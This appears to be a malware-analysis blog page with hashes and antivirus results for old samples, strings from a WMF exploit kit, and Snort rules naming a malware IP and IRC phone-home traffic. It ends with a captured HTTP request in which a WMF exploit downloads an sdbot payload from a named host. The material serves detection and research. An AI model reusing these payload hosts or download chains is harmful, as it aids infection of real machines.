Skip navigation.
Home

Malware

Adware.BBuddy-14

| |

Scanning -> C:\malware\installer_SIAC.exe
#################################
FILE TYPE: MS-DOS executable (EXE), OS/2 or MS Windows
MD5SUM: 40a12114f3c68f38eaf39c01b29a02f3
SHA1SUM: 9ed9267487e85e565af5cb2f0bdfc72a796d887c
SHA256SUM: e4537ce1f08dd7b66c9bf89f0219a73627ea3922b0be5dfa7cb7533ae12c601c
A/V SCAN: Adware.BBuddy-14
PACKER: none
#################################

Dialer-306

| |

Scanning -> C:\malware\gdnUS333.exe
#################################
FILE TYPE: MS Windows PE 32-bit Intel 80386 GUI executable not relocatable
MD5SUM: fec0e03b377480e204d3a3b3d94321e6
SHA1SUM: 45dcd1ab95ca0162ab2f5a5ab46492a1c3d2159b
SHA256SUM: 1067b44eaa8ad81e1834e02490b88a02069f3160de570971df3b76f1bb7dcda0
A/V SCAN: Dialer-306
PACKER: none
#################################

wmf construction kit

| |

Thanks to one of our users we have a copy of the wmf construction kit.

There are lots of really obvious signatures from this kit so I find it less than useful. Metasploit is not that hard to use, comon!

00041A10 00443610 0 c:/mnt/samo/mingw/msys/mthr_stub.c

0003E402 00440002 0 Have fun
0003E41A 0044001A 0 ApacheEatsGnu
0003E432 00440032 0 ------visit www.egocrew.de-----
0003E454 00440054 0 Exploit by Metasploit Framework
0003E475 00440075 0 %s

This stuff is retained by the actual wmf files it outputs.

Another modern classic: Virus.Win9x.CIH

This was a pretty widespread and nasty virus years ago that would flash the bios of the host machine with garbage on April 26.

MD5: 862582b7072427a095aaac9c6a93f81f
SHA1: 62c1895018a7b521504f6531e1e4f56ba15cec01

AntiVir Found CIH #1
ArcaVir Found W95.CIH.1003
Avast Found Win95:CIH 1.x
AVG Antivirus Found Win32/CIH
BitDefender Found Trojan.Win95.Flashkiller
ClamAV Found CIH.2
Dr.Web Found nothing
F-Prot Antivirus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found nothing
NOD32 Found nothing
Norman Virus Control Found nothing
UNA Found nothing
VBA32

Trojan.Win32.Kuang

For love of the old school and keeping it real I've run some older malware through some modern AV/MW detection software. Interesting results:

MD5: 4ea8483c238bdb7fb8daea13b0b61530
SHA1: 9991b460b4724334828c4dac6ca1d3eabb06df3e

AntiVir
Found nothing
ArcaVir
Found nothing
Avast
Found nothing
AVG Antivirus
Found W95/Weird
BitDefender
Found nothing
ClamAV
Found nothing
Dr.Web
Found nothing
F-Prot Antivirus
Found nothing
Fortinet
Found nothing
Kaspersky Anti-Virus
Found Email-Flooder.Win32.Weirder (probable variant)
NOD32
Found nothing
Norman Virus Control

Win32.Klone.b analysis

Just another downloader, fully reversed into C code. I've picked it up a few days ago and sent to AVs, so most of them have signatures by now:

MD5: ec9dfa116b8f41e3918ec45a26597495

AntiVir Found nothing
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found Klone
BitDefender Found GenPack:Trojan.Downloader.Galapoper.A
ClamAV Found nothing
Dr.Web Found Trojan.Galapoper
F-Prot Antivirus Found nothing
Fortinet Found W32/KlonePacked.B-tr
Kaspersky Anti-Virus Found Packed.Win32.Klone.b
NOD32 Found probably a variant of Win32/TrojanDownloader.Small.AVT (probable variant)

Snort Rules for Detecting Dasher, sdbot, and bad netblocks

alert tcp $HOME_NET any -> $EXTERNAL_NET 6667 (content:"rain357"; nocase; msg:"[OFFENSIVE COMPUTING]Dasher variant phoning home to IRC server";sid:66600001;rev:1)

alert tcp $HOME_NET 5262 -> $EXTERNAL_NET any (flags:S;msg:"[OFFENSIVE COMPUTING]Dasher Variant SYN scanning home";sid:66600002;rev:1)

alert tcp $HOME_NET any -> 212.27.63.117 80 (msg:"[OFFENSIVE COMPUTING] HTTP connection to known malware provider for WMF exploit";sid:66600003;rev:1;)

alert tcp $HOME_NET any -> 212.27.63.117 80 (msg:"[OFFENSIVE COMPUTING] HTTP connection to known malware provider downloading sdbot05b.jpg for WMF exploit";content:"sdbot05b.jpg";nocase;sid:66600004;rev:1;)

More wmf files

| |

I have some wmf exploit files.

Dasher Variant Traffic, Known WMF provider, and traffic to bad netblocks

alert tcp $HOME_NET any -> $EXTERNAL_NET 6667 (content:"rain357"; nocase; msg:"[OFFENSIVE COMPUTING]Dasher variant phoning home to IRC server";sid:66600001;rev:1)

alert tcp $HOME_NET 5262 -> $EXTERNAL_NET any (flags:S;msg:"[OFFENSIVE COMPUTING]Dasher Variant SYN scanning home";sid:66600002;rev:1)

alert tcp $HOME_NET any -> 212.27.63.117 80 (msg:"[OFFENSIVE COMPUTING] HTTP connection to known malware provider for WMF exploit";sid:66600003;rev:1;)

alert tcp $HOME_NET any -> 212.27.63.117 80 (msg:"[OFFENSIVE COMPUTING] HTTP connection to known malware provider downloading sdbot05b.jpg for WMF exploit";content:"sdbot05b.jpg";nocase;sid:66600004;rev:1;)

more win_wmf

| |

Thanks to seville we have more wmf stuff. These go out to a site and download a new file.
Heres some pretty pictures:



So sdbot05b.jpg gets turned into command.pif

GET /sdbot05b.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: charmedmadgic.free.fr
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Mon, 02 Jan 2006 05:24:45 GMT
Syndicate content